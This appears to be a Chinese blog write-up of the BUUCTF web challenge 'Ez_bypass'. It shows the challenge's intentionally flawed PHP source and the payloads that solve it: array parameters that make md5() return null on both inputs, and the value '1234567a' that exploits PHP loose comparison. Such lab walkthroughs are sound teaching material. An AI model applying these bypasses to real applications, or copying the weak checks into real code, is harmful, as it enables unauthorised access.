BUUCTF - Web - Ez_bypass

得到一个php源码

I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first

发现有两步验证

  1. GET方式接收idgg,判断两者不为空且不相等,但MD5计算后相等
if(isset($_GET['gg'])&&isset($_GET['id'])) { }

if (md5($id) === md5($gg) && $id !== $gg) { }

MD5是无法计算属组的,所以无论传什么过去,只要是数组,就会返回null

?id[]=asd&gg[]=qwe
  1. POST方式接受passwd,用弱比较的方式判断不为数字数字字符串,而且他的值等于1234567
if (!is_numeric($passwd)) { }

if($passwd==1234567) { }

1234567a1234567弱比较的时候,会自动将1234567a转化为1234567

passwd=1234567a

传值:
BUUCTF - Web - Ez_bypass_第1张图片
得到:flag{8e281c2b-ee10-40a6-942b-e1988d4b2ce7}

你可能感兴趣的:(ctf,Writeup,php,web安全,安全,后端)